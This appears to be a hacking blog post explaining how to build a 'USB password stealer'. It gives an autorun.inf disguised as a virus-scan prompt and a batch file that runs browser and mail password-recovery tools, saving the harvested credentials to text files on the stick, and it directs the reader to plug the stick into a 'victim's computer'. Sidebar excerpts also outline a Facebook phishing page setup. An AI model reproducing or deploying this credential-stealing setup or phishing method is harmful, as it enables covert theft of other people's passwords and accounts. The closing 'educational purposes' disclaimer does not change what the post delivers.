Skip to main content

What is "USB Stealer" ? & How it is Work?

                             

 Windows allows the storage of the passwords, as do modern browsers. While this feature is convenient for users, it has imposed itself as a big security risk among organizations. We know that browsers store most passwords on daily basis, like MSN messenger, Yahoo, Facebook passwords, etc. Most people lack time and ask their browsers to save their passwords. As we know, there are many tools available to recover saved passwords, so in this article I will explain to you how to make a USB password stealer and steal saved passwords.

Just to explain the concept, we are going to collect some password stealing tools, tools that are freely available on the internet and capable of stealing the passwords stored in the browsers or other windows files.
Then, we create a batch program that will execute these combined programs and store the stolen usernames and passwords in a text file.

To further spice up the penetration testing demonstration, we will also make this batch file execute as an auto-run for the USB stick, effectively stealing the passwords as we plug it in.

 THINGS YOU WILL NEED

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications.

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express, windows mail, POP3, etc.

IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer. Protected storage pass viewer(PSPV) - Protected Storage Passview is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express, and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.

ChromePass - ChromePass is a small password recovery tool that allows you to view the usernames and passwords stored by Google Chrome Web browser.

STEPS :

1. First of all download all 5 tools and copy the executables (.exe files) i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and input the following text:

[autorun] open=launch.bat ACTION= Perform a Virus Scan
Save the Notepad and rename it from "New Text Document.txt" to "autorun.inf"
Now copy the "autorun.inf" file onto your USBStick.

3. Create another Notepad and write the following text onto it:

start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt

4. Save the Notepad and rename it from "New Text Document.txt" to "launch.bat"

5. Copy the "launch.bat" file onto your USB drive. Now your USB Password stealer is ready, all you have to do is insert it in your victim's computer and a popup will appear. In the popup window, select the option "launch virus scan."

After this you can see saved password in .TXT files

Purely for educational purposes. Use these tools at your own risk!
                           
Labels:

Comments

Post a Comment

Popular posts from this blog

HOW TO HACK FACEBOOK ACCOUNT BY PHISHING [HOSTING]

Hack Facebook account by PHISHING (WEBHOSTING) It is a process to create a fake page of any website which feels and look like original website and sending to victim. By entering details by the victim, the details comes to us. It is some long method but good method. Step 1: You will need these files in next steps. Download these files from  here Step 2: Now go to free hosting sites. There are many but I used to use 000Webhost. Now create your account signing up there. After signing up, confirm your account with confirmation link sent in your e-mail. Sign up  here . Step 3: Now login your account. Step 4: Click on create new account. Step 5: Create your domain name and fill required information. Step 6: Now go to Control Panel and then click on File Manager. Step 7: Click on public_html. Step 8: Delete default.php file and click on upload. Step 9: Now upload your downloaded files. Now your phishing page is ready. Your phishing l...
Post a Comment
Read more

CREATE WHATSAPP GROUP INVITATION LINK

How to create Whatsapp group Invitation link [Now available in Original Whatsapp also] Hello friends, now you can create your own group invitation link in whatsapp to add members themselves. If you want to create a group invitation link then read all. It is very simple method. Below, the page is looking long because I have given in full details with screenshots. Requirements:  You must be  Admin  of that group. Whatsapp Nano .  Click here  to download. Patience. STEP 1: Go to that  group  which you want to create a link. STEP 2: Click to  menu  (i.e. 3 dots). STEP 3. Click on  Group info . STEP 4: Click on  Add participant.. STEP 5:  Here, click on  Invite to group via link .                                                 STEP 6:  Copy  the given link.    ...
Post a Comment
Read more

WHAT IS HACKING ? THINGS YOU SHOULD KNOW ABOUT HACKING.

There are many definitions of hacking. In this article, we will define hacking as identifying weakness in computer systems and/or networks and exploiting the weaknesses to gain access. An example of hacking is using by passing the login algorithm to gain access to a system. A hacker is a person who finds and exploits weakness in computer systems and/or networks to gain access. Hackers are usually skilled computer programmers with knowledge of computer security. Before we go any further, let’s look at some of the most commonly used terminologies in the world of hacking. Types of Hackers Hackers are classified according to the intent of their actions. The following list classifies hackers according to their intent. 1.Ethical Hacker (White hat): A hacker who gains access to systems with a view to fix the identified weaknesses. They may also perform penetration testing and vulnerability assessments. 2.Cracker (Black hat): A hacker who gains unauthorized access to ...
Post a Comment
Read more